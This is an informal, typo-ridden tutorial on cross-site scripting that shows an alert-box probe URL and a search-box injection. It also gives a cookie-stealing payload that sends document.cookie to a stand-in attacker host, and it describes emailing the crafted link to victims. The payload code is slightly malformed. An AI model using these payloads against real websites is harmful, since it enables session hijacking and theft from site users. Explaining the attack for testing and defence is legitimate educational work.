Cross site Scripting :the evil

  To check cross site vulnerability in your site!                           

cross site scripting vulnerabilities date back to 1996-the early days of the world wide web .over time ,these types of attacks have evolved so much that they are one of the most critical vulnerabilities on the internet toady. it is estimatedd that seven out of ten web applications are vulnerable to xss attacks.

xss results in a type of injection problems,which happens mainly when data is included in dynamic content that is sent to a web browser without using validation.malicious content often takes the form of javascript but can also includde HTML ,flash or any other type of code
that browser can execute.


let's assume that the site http://victim.com/ is vulnerable to xss .how we will check it? the basic method is by trying to inject a javascript pop-up alert string with url:

http://victim.com/"><script> alert('XSS%20Testing')</script>

if the command inside the url get unsanitised this will trigger a pop-up alert.see figure


at this point ,an attacker may continue to modify the url to include more sophisticated XSS payloads
to exploit users.
let's try a more advanced payload that can steal user's cookies:

http://victim.com/"><script> var+img=new+img();img.src="http://attacker/"%20+%20document.cookie;</script>


the above javascript code create an image DOM object(var image = new image).since the javascript code executed above is within the url context the attacker has access to cookie data.the image object is assigned to another domain,namely http://attacker.com/ append within the web browser cookie string where the data has to be send.now the attacker can framed this url in email and send it to the user,who may click on the link and victimised.


another method of testing XSS is to inject malicious code in the search box provided in the victim website.

><script> alert('XSS%20Testing')</script>

if the website is vulnerable ,this can also trigger a pop-up box.